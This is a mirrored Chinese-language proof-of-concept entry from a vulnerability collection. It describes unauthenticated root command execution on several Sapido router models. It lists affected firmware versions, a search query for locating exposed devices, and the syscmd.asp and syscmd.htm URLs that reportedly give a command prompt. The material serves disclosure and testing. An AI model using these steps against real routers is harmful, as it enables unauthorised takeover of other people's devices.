mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
39 lines
592 B
Markdown
39 lines
592 B
Markdown
|
|
# Sapido 多款路由器 远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
Sapido多款路由器在未授权的情况下,导致任意访问者可以以Root权限执行命令
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
BR270n-v2.1.03
|
|||
|
|
BRC76n-v2.1.03
|
|||
|
|
GR297-v2.1.3
|
|||
|
|
RB1732-v2.0.43
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="Sapido-路由器"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
固件中存在一个asp文件为 **syscmd.asp** 存在命令执行
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
访问目标:
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
http://xxx.xxx.xxx.xxx/syscmd.asp
|
|||
|
|
http://xxx.xxx.xxx.xxx/syscmd.htm
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
直接输入就可以命令执行了
|
|||
|
|
|